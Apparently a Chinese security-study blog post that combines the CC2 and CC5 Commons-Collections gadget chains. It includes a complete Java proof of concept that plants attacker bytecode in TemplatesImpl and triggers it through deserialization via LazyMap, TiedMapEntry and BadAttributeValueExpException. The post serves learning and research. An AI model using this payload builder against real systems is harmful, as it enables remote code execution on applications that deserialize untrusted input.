devbox
weixin_40725706
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

Java安全学习笔记--基于ysoserial反序列化利用工具CC2和CC5链构造方式的思考_cc2和cc5之间有哪些区别

作者:weixin_40725706 | 2024-06-09 15:59:11

cc2和cc5之间有哪些区别

前言:

ysoserial反序列化利用工具的CC5链和CC6链的利用链核心都还是LazyMap+ChainedTransformer,两条利用链通过TideMapEntry的toString和hashCode方法来触发核心利用链,最终触发get方法,这里是否能模仿CC3,CC4链做一个拼接呢?

思考实现方式:

把三个方法放一块

  1. public V getValue() {
  2.     return this.map.get(this.key);//这里的this.map就是我们的LazyMap
  3. }
  4. //LazyMap的get方法:
  5. public V get(Object key) {
  6.         if (!this.map.containsKey(key)) {
  7.             V value = this.factory.transform(key);
  8.             this.map.put(key, value);
  9.             return value;
  10.         } else {
  11.             return this.map.get(key);
  12.         }
  13.     }
  14.  
  15. //这里的key随便传入,但是是否这里的key感觉可以利用
  16. public int hashCode() {
  17.     Object value = this.getValue();
  18.     return (this.getKey() == null ? 0 : this.getKey().hashCode()) ^ (value == null ? 0 : value.hashCode());
  19. }
  20.  
  21. public String toString() {
  22.     return this.getKey() + "=" + this.getValue();
  23. }

LazyMap的key值由于核心构造链的ConstantTransformer的transform方法我们传什么都不会影响transform方法的调用结果,但是在回顾之前的cc链时发现似乎有些相似的地方。

  1. //TransformingComparate
  2. public int compare(I obj1, I obj2) {
  3.         O value1 = this.transformer.transform(obj1);
  4.         O value2 = this.transformer.transform(obj2);
  5.         return this.decorated.compare(value1, value2);
  6.     }
  7. //Lazymap
  8. public V get(Object key) {
  9.         if (!this.map.containsKey(key)) {
  10.             V value = this.factory.transform(key);
  11.             this.map.put(key, value);
  12.             return value;
  13.         } else {
  14.             return this.map.get(key);
  15.         }
  16.     }

cc2链的中的一个节点使用InvokeTransformer来触发templateImp类的newTransformer,而接下来使用的是TransfomingComparator+priorityQueue来触发,我们把compare方法和get方法放一起,可以看出来了compare中的obj1被传入并被利用到,但是get方法的key没有被利用,那如果这个key是一个有效的obj1,不知道是否能实现。

实现:

  1. import javassist.ClassPool;
  2. import javassist.CtClass;
  3. import org.apache.commons.collections4.functors.InvokerTransformer;
  4. import org.apache.commons.collections4.keyvalue.TiedMapEntry;
  5. import org.apache.commons.collections4.map.LazyMap;
  6.  
  7. import javax.management.BadAttributeValueExpException;
  8. import java.io.ByteArrayInputStream;
  9. import java.io.ByteArrayOutputStream;
  10. import java.io.ObjectInputStream;
  11. import java.io.ObjectOutputStream;
  12. import java.lang.reflect.Constructor;
  13. import java.lang.reflect.Field;
  14. import java.util.HashMap;
  15.  
  16. public class CCxPOC {
  17.     public static void main(String[] args) throws Exception {
  18.         //将恶意类转换为字节码
  19.         ClassPool classPool = ClassPool.getDefault();
  20.         CtClass ctClass = classPool.getCtClass("com.test.evilClass");
  21.         byte[] bytes = ctClass.toBytecode();
  22.  
  23.         //反射创建TemplatesImpl
  24.         Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
  25.         Constructor<?> constructor = aClass.getDeclaredConstructor();
  26.         //TemplatesImpl有无参构造不需传参
  27.         Object templatesImpl = constructor.newInstance();
  28.         //将恶意类的字节码设置给_bytecodes属性
  29.         Field bytecodes = aClass.getDeclaredField("_bytecodes");
  30.         bytecodes.setAccessible(true);
  31.         bytecodes.set(templatesImpl, new byte[][]{bytes});
  32.         //设置属性_name为恶意类名
  33.         Field name = aClass.getDeclaredField("_name");
  34.         name.setAccessible(true);
  35.         name.set(templatesImpl , "evilTemplatesImpl");
  36.         //利用invokerTransformer类的transform方法来触发newTransformer
  37.         InvokerTransformer transformer=new InvokerTransformer("newTransformer",null,null);
  38.         LazyMap lazyMap=LazyMap.lazyMap(new HashMap(),transformer);
  39.         TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,templatesImpl);
  40.         BadAttributeValueExpException badAttributeValueExpException=new BadAttributeValueExpException("sad");
  41.         Class classInstance=badAttributeValueExpException.getClass();
  42.         Field field=classInstance.getDeclaredField("val");
  43.         field.setAccessible(true);
  44.         field.set(badAttributeValueExpException,tiedMapEntry);
  45.  
  46.         //
  47.         ByteArrayOutputStream byteArrayOutputStream=new ByteArrayOutputStream();
  48.         ObjectOutputStream objectOutputStream=new ObjectOutputStream(byteArrayOutputStream);
  49.         objectOutputStream.writeObject(badAttributeValueExpException);
  50.         objectOutputStream.close();
  51.         //
  52.         ByteArrayInputStream byteArrayInputStream=new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
  53.         ObjectInputStream objectInputStream=new ObjectInputStream(byteArrayInputStream);
  54.         objectInputStream.readObject();
  55.     }
  56. }

总结:

写完直接一次运行就过了说明这个思路可行,这里用的是CC2和CC5拼接,那CC2拼接CC6也就同样可行了,不过这还是相当于基于之前的CC链做的拼接,可能早就被实现过了,但起码有了自己的思考而不是仅仅只是复现。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/694823
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号